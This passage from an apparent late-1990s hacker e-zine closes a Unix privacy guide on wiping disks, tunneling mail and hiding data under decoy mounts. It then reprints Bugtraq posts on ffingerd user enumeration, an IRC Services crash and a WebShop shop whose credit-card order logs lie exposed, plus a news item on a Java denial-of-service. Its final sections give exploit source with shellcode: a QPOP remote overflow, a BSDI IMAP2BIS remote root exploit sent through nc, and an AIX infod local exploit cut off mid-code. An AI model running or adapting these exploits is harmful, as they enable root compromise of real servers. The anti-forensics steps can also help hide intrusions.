the data in a secure way, an attacker can get all your private emails just because you didn't know. That's bad.
The solution: You use a wiper program which cleans all unused data from the disk partitions.
The only one available is the one from THC's secure_delete package. You could put "sfill" (that is what it is called) in you crontab so it is run regulary but this might
create problems when at this moment this space is needed by an important application. At least when the system shuts down, sfill should be called.
Put this in the "stop" part of a late rc2.d script:
sfill -llf /tmp 2> /dev/null
sfill -llf /var/spool 2> /dev/null
Note that it is a good idea to generate a new paritition for /tmp itself, and putting a symlink from /usr/tmp and /var/tmp to /tmp. This way it is easier to control and
wipe.
Again, if you can't install the secure_delete package for any reason, you can also use this solution (slower and not as secure):
dd if=/dev/zero of=/tmp/cleanup
sync
rm /tmp/cleanup
*** 3. How to handle swap data
Securely wiping files and free diskspace - well what's left? Today, harddisk MB's are cheaper than RAM, thats why swap space is used to expand the available
RAM. This is in reality a file or partition on your harddisk. And can have your sensitive data in it.
Again there is only one tool which helps you out here, "sswap" from THC's secure_delete package ;-)
Put this line after the "swapoff" line in /sbin/init.d/halt:
sswap -l /dev/XXXX # the device for your swap, check /etc/fstab
*** 4. How to handle RAM
In section V.5 I wrote about sensitive information in your RAM, the fast memory of your computer system. It can hold very sensitive information like the email you
wrote before pgp'ing it, passwords, anything.
To ensure, that the memory is cleaned, use the smem utility.
It should be called like this in the stop part of a late rc2.d script (as already mentioned above), after the wiping the file of /tmp etc. and then wiping the free memory:
smem -ll
*** 5. Temporary data - it is evil
After you have secured/anonymized/privatized your system so far everything's ready - or did you forget something?
Remember what we told you in section VI.1, that temporary data is written somewhere and sometimes you don't know. If you are unlucky, all we've done here was
useless. We have to ensure that there's no temporary data left on the devices and that it can't be recovered either.
We already dealed with /var/log, /var/run and sent email (/var/spool/...), and we wipe all free diskspace from our temporary disk locations. Now we must wipe also
the temporary data.
Put this line in the stop part of a late rc2.d script (before sfill from VI.3):
( cd /tmp ; ls -A | xargs -n 250 srm -r ; )
Also a $USER/tmp directory should be created for all users under the CFS /home protection and a TMPDIR variable set to this directory.
See section IX. for all these scripts ...
* VII. NETWORK CONNECTIONS
This is a very specialized area of this document. I write here a few ways how someone can protect some of their data being transfered on the internet.
The basic prerequisites are as following: You've got an external POP3 and SMTP (mail relayer) where you get and send your email. When your go on irc, you also
don't like your real hostname being printed on the channels.
Your external mail server should be in another country, because if maybe some official agencies think you're doing something illegal (and I'm sure you won't) it's
harder to get a search warrant. It's also harder because companies or individuals that try to get your data would need to invest more time, work and money to get it.
You can tunnel your SMTP and POP3 via ssh to the external mail server.
For POP3 this is easy, but for SMTP this is a bit harder.
Just as an example, irc traffic can be tunneled through this as well, but dcc stuff won't work (one way doesn't work, the other would reveal your ip address to the
sender and the data is not encrypted on any part of the internet)
Note that you can also use redirectors and proxies to accomplish further redirecting for other protocols (www, irc, ftp proxies etc.)
Thats all. All mail traffic (and as you can see below, irc traffic too) is being crypted between you and your mail/proxy server.
sendmail.cf (important parts):
DSsmtp:[127.0.0.1]
DjTHE_DOMAIN_NAME_OF_YOUR_EMAIL
DMTHE_DOMAIN_NAME_OF_YOUR_EMAIL
- Msmtp, P=[IPC], F=mDFMuX, S=11/31, R=21, E=\r\n, L=990,
+ Msmtp, P=[IPC], F=mDFMuXk, S=11/31, R=21, E=\r\n, L=990,
(add the "k" switch to the smtp option config line)
~user/.fetchmailrc:
poll localhost protocol POP3:
user USER_REMOTE with pass PASSWORD_REMOTE is USER_LOCAL here
mda "/usr/sbin/sendmail -oem USER_LOCAL"
(enter the corresponding USER_* and PASSWORD in here)
The ssh commandline which tunnels the traffic for POP3, SMTP and irc:
ssh -a -f -x -L 110:localhost:110 -L 6667:irc.server.com:6667 -L \
25:localhost:25 your_mail_server.com
That's all. I won't tell you more. Use your brain ;-)
* VIII. HIDING PRIVACY SETTINGS *** 1. Mount is your friend
Take a look at the following commands:
# ls -l /home
total 3
drwxr-x--- 1 root root 1024 Mar 28 14:53 admin
drwxr-x--- 1 vh thc 1024 Mar 28 16:22 vh
drwxr-x--- 1 user users 1024 Mar 28 11:22 user
# mount -t ext2 /dev/hda11 /home # or a ramdisk, doesn't matter
# ls -l /home
total 0
# : whoops, where are the homedirs ?
# umount /home
# ls -al /home
total 3
drwxr-x--- 1 root root 1024 Mar 28 14:53 admin
drwxr-x--- 1 vh thc 1024 Mar 28 16:22 vh
drwxr-x--- 1 user users 1024 Mar 28 11:22 user
# : ah, yeah there they are again ...
This is a nice feature to hide your crypted data and binaries. Just put your files into e.g. /usr/local/bin and /usr/local/crypt and mount a decoy filesystem over
/usr/local. If you then have got a process started in your boot scripts which opens a file on the decoy filesystem, the filesystem can't be unmounted until the process is
killed. This way, it's much harder for someone to detect your data!
*** 2. Removable Medias
An even better possibility is: put all your sensitive data on a removable media. Put your media in, mount it, it run the startscript from it to activate all the privacy stuff.
This way you made it one step harder for someone to get to know whats going on.
*** 3. ???
Any other ideas? Think about it! (and maybe send me your ideas ;-)
* IX. EXAMPLE CONFIGURATION AND SCRIPTS
Click here to download the anonymous-unix-0.7.tar.gz tools!
* X. FINAL COMMENTS
*** 1. Where to get the tools mentioned in this text
- Crypto Filesystems
CFS (Cryptographic File System) http://www.replay.com
TCFS (Transparent CFS) ftp://mikonos.dia.unisa.it/pub/tcfs/
SFS (Stegano File System) http://www.linux-security.org/sfs
Crypto Loopback Filesystem ftp://ftp.csua.berkeley.edu/pub/cypherpunks/filesystems/linux/
- Tools
THC's secure_delete package http://www.infowar.co.uk/thc
secure-linux kernel patch http://www.false.com/security
syslog-ng http://www.balabit.hu/products/syslog-ng.htm
ssylog http://www.core-sdi.com/ssyslog
- The example Linux Distribution
SuSE Linux Distribution http://www.suse.com
*** 2. Additional thoughts
The following problems are still present:
- If an attacker can gain access to the system without rebooting and in time before data is wiped, unmounted, etc. these countermeasures are worthless.
- If a really well funded organisation is trying to decrypt your data via brute force/dictionary or good electronic microscopes and technical staff with excellent
knowhow, your wiping won't help you very much.
- The solution for /var/spool/mail and /var/spool/mqueue etc. is far away from being perfect. Remember this. Ideas welcome.
- The configuration of your system daemons can only be secured if you are present at the console after a reboot. That's the price.
- It is not very hard to detect the privacy stuff done. This might bring you in trouble in countries like China or Iran. Removable medias might help, or try a
crypto filesystem with stegano support.
Secure your system against unauthorized (from your point of view) access and use strong passwords.
*** 3. Greetings (what would the world be without greets?)
What would the world be without love and greetings? ;-)
Greets to individuals (in alphabetic order):
Doc Holiday, Froody, Fyodor, plasmoid, pragmatic, rookie, Solar Designer, Tick, Wilkins.
Greets to groups:
ADM, THC (of course ;-) and arF
Greets to channel members:
#bluebox, #hack, #hax, #!adm and #ccc
*** 4. How to contact me for updates or comments
Please send me any further ideas you've got to make this documentation better! Did I wrote bad bad english in some part? Could I rephrase parts to make it easier
to understand? What is wrong? What's missing? van Hauser / THC - [The Hacker's Choice]
THC's Webpage -> http://r3wt.base.org
(or http://thc.pimmel.com or http://www.infowar.co.uk/thc)
Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC <vh@reptile.rug.ac.be>
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3i
mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU
SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L
XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC
meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc
QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq
s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU
SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD
/3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn
CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYnOkUXgUQdPo69B04dl
C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN
1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ
PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ
2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X
lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/
Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI
o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw==
=MdzX
-----END PGP PUBLIC KEY BLOCK-----
@HWA
22.0 Ffingerd vulnerability
~~~~~~~~~~~~~~~~~~~~~~
Date: Fri, 23 Apr 1999 19:26:13 +0300
From: Eilon Gishri <eilon@ARISTO.TAU.AC.IL>
To: BUGTRAQ@netspace.org
Subject: Ffingerd privacy issues
Hi,
I found a couple of bugs in ffingerd 1.19 which are related to
privacy.
Here goes:
The permission on root's home directory are now 700 (/home/root).
-----
(aristo)/cc/eilon>finger root@host.domain
[host.domain]
Login: root Name: #6
No project.
No plan.
No public key.
-----
A lesson in how not to be seen. On host.domain, the user doesn't want
to be seen (please stand up :)). Too bad, his/her home directory's
permissions (which says 'I want some privacy') makes ffingerd state
otherwise. Ffingerd looks for the file .nofinger in the user's home
directory but due to the current state of permissions on it, it can't
be accessed thus "there is no such file" and there for is happy to
supply us with the user's information.
-----
# cd ~root
# ls -l .nofinger
-rw-r--r-- 1 root system 0 Apr 23 18:01 .nofinger
# ls -ld .
drwx------ 5 root system 512 Apr 23 18:01 .
# chmod 755 .
-----
Now lets try again.
-----
(aristo)/cc/eilon>finger root@host.domain
[host.domain]
That user does not want to be fingered
-----
Hmmm, now for an unknown user.
-----
(aristo)/cc/eilon>finger root1@host.domain
[host.domain]
That user does not want to be fingered.
-----
Oops. Notice the dot ('.') at the end of the sentence. A very simple
and efficient way to find whether the user exists on the remote host
or not (taking into account the fact that ffingerd has been installed
on the remote host).
Attached here a patch to fix those problems.
--
Eilon Gishri eilon@aristo.tau.ac.il
Security Consultant Office: +972-3-6406723
Israel Inter University Computation Center Fax: +972-3-6409118
/* On a matter of national security */ Home: +972-3-5078671
[ Part 1.2, Text/PLAIN 20 lines. ]
--- ffingerd.c.old Thu Feb 18 12:50:36 1999
+++ ffingerd.c Fri Apr 23 18:48:54 1999
@@ -134,7 +134,7 @@
setgid(pwd->pw_gid);
setuid(pwd->pw_uid);
sprintf(filename,"%.200s/.nofinger",pwd->pw_dir);
- if (lstat(filename,&stat_buf)) {
+ if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) {
#ifndef NO_SYSLOG
#ifdef FASCIST_LOGGING
char message[512];
@@ -154,7 +154,7 @@
dump_file(filename,"Public key:","No public key.");
} else {
char message[512];
- puts("That user does not want to be fingered");
+ puts("That user does not want to be fingered.");
#ifndef NO_SYSLOG
sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote);
syslog(LOG_FACILITY,"%s",message);
------------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 19:43:33 +0200
From: Felix von Leitner <leitner-bugtraq@MATH.FU-BERLIN.DE>
To: BUGTRAQ@netspace.org
Subject: Re: Ffingerd privacy issues
Thus spake Eilon Gishri (eilon@aristo.tau.ac.il):
> I found a couple of bugs in ffingerd 1.19 which are related to
> privacy.
OK. I would be happy if you email me (the author) first before
publishing this on bugtraq. Next time, maybe.
[ffingerd assumes the user wants to be fingered if his home does not
give public execute access]
This is documented in ffingerd. If you want ffingerd to look into
protected homes, run it as root.
> -----
> (aristo)/cc/eilon>finger root@host.domain
> [host.domain]
> That user does not want to be fingered
> -----
> Hmmm, now for an unknown user.
> -----
> (aristo)/cc/eilon>finger root1@host.domain
> [host.domain]
> That user does not want to be fingered.
> -----
> Oops. Notice the dot ('.') at the end of the sentence. A very simple
> and efficient way to find whether the user exists on the remote host
> or not (taking into account the fact that ffingerd has been installed
> on the remote host).
This has been pointed out to me yesterday. I fixed it today (before I
saw this message, by the way), and announced version 1.20 on Freshmeat
pointing out this fixed problem. Did you see my announcement and then
posted to bugtraq?
> --- ffingerd.c.old Thu Feb 18 12:50:36 1999
> +++ ffingerd.c Fri Apr 23 18:48:54 1999
> @@ -134,7 +134,7 @@
> setgid(pwd->pw_gid);
> setuid(pwd->pw_uid);
> sprintf(filename,"%.200s/.nofinger",pwd->pw_dir);
> - if (lstat(filename,&stat_buf)) {
> + if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) {
> #ifndef NO_SYSLOG
> #ifdef FASCIST_LOGGING
> char message[512];
This is debatable.
If a user wants privacy, he should remove the world readable permission,
not the world executable permission.
I will not add this right now but think it over. If anyone wants to
comment on the way to go here, feel free to email me. I would prefer
discussion this in private email than on bugtraq, but if you must, I
will also read bugtraq comments.
> @@ -154,7 +154,7 @@
> dump_file(filename,"Public key:","No public key.");
> } else {
> char message[512];
> - puts("That user does not want to be fingered");
> + puts("That user does not want to be fingered.");
> #ifndef NO_SYSLOG
> sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote);
> syslog(LOG_FACILITY,"%s",message);
This has already been fixed.
Felix
------------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 22:00:08 +0300
From: Eilon Gishri <eilon@ARISTO.TAU.AC.IL>
To: BUGTRAQ@netspace.org
Subject: Re: Ffingerd privacy issues
On Fri, Apr 23, 1999 at 07:43:33PM +0200, Felix von Leitner wrote:
> Thus spake Eilon Gishri (eilon@aristo.tau.ac.il):
> > I found a couple of bugs in ffingerd 1.19 which are related to
> > privacy.
>
> OK. I would be happy if you email me (the author) first before
> publishing this on bugtraq. Next time, maybe.
I've e-mailed you and Cc-ed BugTraq. As my email includes a fix (A
very complicated one I must say :)) I also notified the list. I'm
not sure I would have done the same if I couldn't fix it myself.
> [ffingerd assumes the user wants to be fingered if his home does not
> give public execute access]
Huh, It's opened if it's closed ?
> This is documented in ffingerd. If you want ffingerd to look into
> protected homes, run it as root.
I want the machine itself to be protected and not only the users home
directory. I consider it a feature when I don't have to run fingerd
as root. Please don't consider it as a flame, I do like this utility
and am using it.
> > -----
> > (aristo)/cc/eilon>finger root@host.domain
> > [host.domain]
> > That user does not want to be fingered
> > -----
>
> > Hmmm, now for an unknown user.
>
> > -----
> > (aristo)/cc/eilon>finger root1@host.domain
> > [host.domain]
> > That user does not want to be fingered.
> > -----
>
> > Oops. Notice the dot ('.') at the end of the sentence. A very simple
> > and efficient way to find whether the user exists on the remote host
> > or not (taking into account the fact that ffingerd has been installed
> > on the remote host).
>
> This has been pointed out to me yesterday. I fixed it today (before I
> saw this message, by the way), and announced version 1.20 on Freshmeat
> pointing out this fixed problem. Did you see my announcement and then
> posted to bugtraq?
Nope. I was playing with it on a machine which I would like to see all
fingers which are done to it without giving away any "free" information
> This is debatable.
> If a user wants privacy, he should remove the world readable permission,
> not the world executable permission.
I disagree.
> I will not add this right now but think it over. If anyone wants to
> comment on the way to go here, feel free to email me. I would prefer
> discussion this in private email than on bugtraq, but if you must, I
> will also read bugtraq comments.
--
Eilon Gishri eilon@aristo.tau.ac.il
Security Consultant Office: +972-3-6406723
Israel Inter University Computation Center Fax: +972-3-6409118
/* On a matter of national security */ Home: +972-3-5078671
------------------------------------------------------------------------------
Date: Fri, 23 Apr 1999 15:46:59 -0500
From: Dagmar d'Surreal <dagmar@EDGE.NET>
To: BUGTRAQ@netspace.org
Subject: Re: Ffingerd privacy issues
Parts/Attachments:
1 Shown 36 lines Text
2 OK 1.4 KB Application, ""
----------------------------------------
As to the matter of the home directories being
world-readable/executeable...
Having the finger daemon assume that there is no .nofinger file because
the home directory in question is not readable, but still executeable,
breaks a few things. On multi-user machines, some users will be extremely
paranoid, and will not wish to use anything BUT mode 700, because having
the directory world-executeable will allow other users on the system to
detect the presence of certain files in their directory (like .rhosts,
.forward, .promcail, .pinerc) that may allow them to launch attacks at
that particular user, knowing that there's a good chance that the user
uses a vulnerable package, and quite possibly even the last time they used
it depending on the file.
After seeing the post on freshmeat, it occurred to me that I had forgotten
to email Felix the patch for 1.18 that took care of the punctuation as
well as a few other issues, and I now notice that I sent him the wrong
version of the patch this morning anyway. (A version which did not have
the directory mode issue fixed, but at least my binary has been working
all this time thankfully.) Eilon Gishri dealt with it a lot more
elegantly than I did anyway. ;)
Attached is a patch which applies to the 1.20 version of Fefe's Finger
Daemon, which includes both Eilon Gishri's patches to deal with paranoid
users whose home directories are mode 700 (the punctuation problem had
already been fixed in 1.20), and my misdirection patches that
add the .fakefinger (lets users controly exactly what will be returned
when they are fingered) file use, and the /etc/ffingerd.empty and
/etc/ffingerd.indirect files which allow a sysadmin to change what kind of
message is sent to people when they try indirect or empty finger queries
without having to edit the source and recompile the daemon.
----------
Unsolicited commercial email sent to this address will be forwarded to
uce@ftc.gov, or responded to late in the evening after I've been clubbing
long enough to be fairly drunk, and at least twice as verbally abusive.
@HWA
22.0 DoS in IRC services
~~~~~~~~~~~~~~~~~~~
Date: Thu, 22 Apr 1999 22:53:42 EDT
From: Andy Church <achurch@DRAGONFIRE.NET>
To: BUGTRAQ@netspace.org
Subject: Bug in Services for IRC Networks 4.2.2
A bug has been found in versions through 4.2.2 of Services for IRC
Networks which allows any IRC user to crash the program. The channel
service's SET SUCCESSOR command does not properly handle the case of no
parameters, and generates a segmentation fault attempting to access
address zero. This bug is believed to be present in all versions since
the SET SUCCESSOR command was introduced (in version 4.1.0).
A new version, 4.2.3, has been released which fixes this bug. Users
of prior versions of Services should upgrade immediately.
Services updates are always announced on the Services mailing list;
see http://achurch.dragonfire.net/services/about.html for information on
subscribing to the list.
--Andy Church
achurch@dragonfire.net
http://achurch.dragonfire.net/
@HWA
23.0 The big e-commerce crunch. Several web shopping carts are still wide open;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 22 Apr 1999 13:09:32 -0400
From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
To: BUGTRAQ@netspace.org
Subject: WebShop advisory.
(hhp) WebShop advisory. (hhp)
---------------------------------------------------------------------
Alright to my knowledge, there is another dangerous shop service
if installed the right way. I contacted the vendor and notified
the admin of the problem. I have the feeling this isnt all though.
I'm almost posotive there are more dangerous shopping services out
there that will be found very soon after all these posts get noticed.
So for now I will look around, please dont flood my email and i'll
repost if I find anything else.
Please remember this does not mean there is a flaw in the service
unless it is by defualt this is left readable on a clean instalation
with no configuration files to modify the permissions. Also PGP
options would illiminate most of the problems.
Also please note I did not install this software, the info I have
gathered was on the website and the vulnerable site was found by a
search engine.
Info:
WebShop via http://www.inetlab.com/products.html
Platforms: Windows 95/98/NT on Intel
Linux on Intel or Sparc
Solaris on Intel or Sparc
FreeBSD 2.2 or smaller on Intel
FreeBSD 3.0 on Intel
BSDI/OS on Intel............... (Found vuln server.)
Silicon Graphics Irix on MIPS.. (Found vuln server.)
Executable: WebShop.cgi
Exposed Directory: WebShop or webshop
Exposed Order info: WebShop/templates/cc.txt
and or WebShop/logs/cc.txt and ck.log
Status: Free?, resale=$50?.
Number of exposed installs found: 2+
PGP Option available?: Unknown.
elaich - 4:16:15CST 4/22/1999
--------------------------------------------
elaich of the hhp.
Email: hhp@hhp.hemp.net / pigspigs@yahoo.com
Voice: 1800-Rag-on-gH pin: The-hhp-crew
Web: http://hhp.hemp.net
--------------------------------------------
@HWA
24.0 New Java bug unveils new Win9x DoS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Astral http://www.403-security.com/
http://www.news.com/News/Item/0,4,35760,00.html
Java bug crashes Windows 95, 98
By Stephen Shankland
Staff Writer, CNET News.com
April 27, 1999, 5:30 p.m. PT
URL: http://www.news.com/News/Item/0,4,35760,00.html
A college student has found a glitch that enables a malicious Java program to crash Windows 95- or
98-based computers.
The bug uses Java to take advantage of a long-standing problem with Microsoft's Windows 95 and
Windows 98 operating systems, according to Joseph Ashwood, a computer research undergraduate student
at the University of Southern California. Specifically, it creates more and more computing processes,
called "threads," until the system runs out of resources.
"It generates so many threads that the system loses all control over itself," Ashwood said.
Such a malicious Java program could be embedded on a Web page, according to Ashwood, who said he came
across the bug when he was looking at the Java source code for a computer security class.
Sun and Microsoft acknowledged the problem, but said that "denial of service" attacks such as Ashwood's
thread-overrun program are common and that protecting against them is difficult.
The Java thread-overrun program is interesting in light of the fact that the malicious program crashes
Windows 95 and 98 computers without ever leaving the Java "sandbox" that's designed to curtail Java
programs so they can't wreak havoc on an operating system. More robust operating systems such as Windows
NT or Sun's Solaris aren't troubled by the bug.
A Microsoft spokesperson said the company is considering addressing the threading weakness, but that
the problem is deeply buried in the operating system architecture and that modifying the relevant code
would require "a major overhaul." Indeed, one of the reasons for developing Windows NT was because of the
need for a more robust threading architecture, the spokesperson said.
Microsoft also encouraged users to be careful which Web sites they visit and what software they download.
The malicious program has crashed Windows 95 and Windows 98 systems with both Microsoft's Internet
Explorer and Netscape Navigator Web browsers, Ashwood said. In some circumstances, Navigator crashes but
the system doesn't, he said.
Ashwood discovered the bug looking at a previous versions of Java, but he's found that it operates with
the most recent version as well.
In his tests, Ashwood has found that Windows NT performance degrades and the browser stops responding.
On Unix systems, the browser hangs up, he said.
From a programming point of view, it's difficult to fix a problem like this one, which takes advantage
of the overuse of an ordinary activity such as generating a new thread, said Roland Jones, senior product
manager for Java security.
"What's doing this is a normal operation taken to excess. It's really hard to tell what's normal and
what's excessive," Jones said.
Creating threads is as basic to computers as eating is to people, but in this case, "The waitress can't
tell that this guy has ordered 47 steaks already."
Ashwood contended "it should be rather simple for either Microsoft or Sun to fix it" by counting and
limiting the threads. He added that it would be most logical for Microsoft to fix it, because the thread
issue is a vulnerability that's not limited just to Java.
The Java-based thread-overrun program runs inside the Java virtual machine, the software component that
lets programs written in Java execute on all sorts of different chips.
The thread overrun issue "could be addressed in the virtual machine. We have some thoughts about what
we can do. But we haven't had that much trouble with it," Jones said. "It's one of the things that's been
on our list to look at."
"The better operating system should be able to handle this," he added .
Ashwood said he notified Sun about the exploit in September, October, and November, and was dissatisfied
with the company's responses. Last week, he described the bug on the Alienware Web site.
@HWA
25.0 QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.and BSDi 2.1
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
* and BSDi 2.1
* 24-Jun-1998 by stran9er
*
* Based:
* FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
* x86 decode.bin/encode.c by Solar Designer.
*
* Disclaimer:
* this demonstration code is for educational purposes only! DO NOT USE!
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define ESP 0xefbfd480
#define BMW 750
main(int argc, char **argv)
{
int i,t,offset = 500;
char buf[1012];
char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
char decode_x86[] =
"\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
"\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
"\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
"\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
char shellcode_BSDi[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
if (argc>1) offset = atoi(argv[1]);
fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
offset+=ESP;
fprintf (stderr," esp+offset=0x%x\n\n",offset);
for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
// memset(buf, 0x90, sizeof(buf));
buf[sizeof(buf)-1]=0;
for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
for(t=0;t < sizeof(shellcode_BSDi);t++) {
buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
}
buf[1008] = (offset & 0xff000000) >> 24;
buf[1007] = (offset & 0x00ff0000) >> 16;
buf[1006] = (offset & 0x0000ff00) >> 8;
buf[1005] = (offset & 0x000000ff);
printf("%s\n",buf);
}
/* -- CONFIDENTIAL -- */
@HWA
26.0 BSDI IMAP2BIS remote root exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
BSDI IMAP2BIS remote root exploit
Usage: (./imapx <offset>;cat)| nc targethost 143
where offset = -1000..1000 (brute force if 0 doesnt work)
Note:
if you plan to port this to other OS., make sure the
shellcode doesn't contain lower case chars since imapd
will toupper() the shellcode, thus fucking it up.
Note:
I tested this on a few system's and found this offsets vulnerable
*/
#include <stdio.h>
#include <stdlib.h>
#include <limits.h>
#include <string.h>
#define BUFLEN 4092
#define NOP 0x90
char shell[] =
"\xeb\x58\x5e"
"\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
"\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
"\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
"\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
"\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
"\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
"\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
"\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
"\x42\x49\x4e\x2f\x53\x48\x00";
void
main (int argc, char *argv[])
{
char buf[BUFLEN];
int offset,nop,i;
unsigned long esp;
char shell[1024+300];
fprintf(stderr,"usage: %s <offset>\n", argv[0]);
nop = 403;
esp = 0xefbfd5e8;
offset = atoi(argv[1]);
memset(buf, NOP, BUFLEN);
memcpy(buf+(long)nop, shell, strlen(shell));
for (i = 1024; i < BUFLEN - 3; i += 2)
{ *((int *) &buf[i]) = esp + (long) offset;
shell[ sizeof(shell)-1 ] = 0;
}
printf("{%d} AUTH\r\n", BUFLEN);
for (i = 0; i < BUFLEN; i++)
putchar(buf[i]);
printf("\r\n");
return;
}
@HWA
27.0 Infod AIX exploit
~~~~~~~~~~~~~~~~~
/* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed
Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.co
Run program with the login you want to exploit :)
When the window appears, select "options", "defaults", change printer
to something more useful (like /bin/x11/xterm) and print !
Comments,questions : arisme@altern.org */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <pwd.h>
#define TAILLE_BUFFER 2000
#define SOCK_PATH "/tmp/.info-help"
#define PWD "/tmp"
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xhost "
void send_environ(char *var,FILE *param)
{ char tempo[TAILLE_BUFFER];
int taille;
taille=strlen(var);
sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
fwrite(tempo,1,taille+4,param);
}
main(int argc,char** argv)
{ struct sockaddr_un sin,expediteur;
struct hostent *hp;
struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_param;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
FILE *param;
char *HOME,*LOGIN;
int UID,GID;
printf("\n\n%s\n\n",KOPY);
if (argc!=2) { printf("%s\n",NOUSER);
exit(1); }
info=getpwnam(argv[1]);
if (!info) { printf("%s\n",UNKNOWN);
exit(1); }
HOME=info->pw_dir;
LOGIN=info->pw_name;
UID=info->pw_uid;
GID=info->pw_gid;
param=fopen("/tmp/tempo.fun","wb");
chaussette=socket(AF_UNIX,SOCK_STREAM,0);
sin.sun_family=AF_UNIX;
strcpy(sin.sun_path,SOCK_PATH);
taille_struct=sizeof(struct sockaddr_un);
if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
{ perror("connect");
exit(1); }
/* 0 0 PF_UID pf_UID 0 0 */
sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
fwrite(buffer,1,6,param);
/* PF_GID pf_GID */
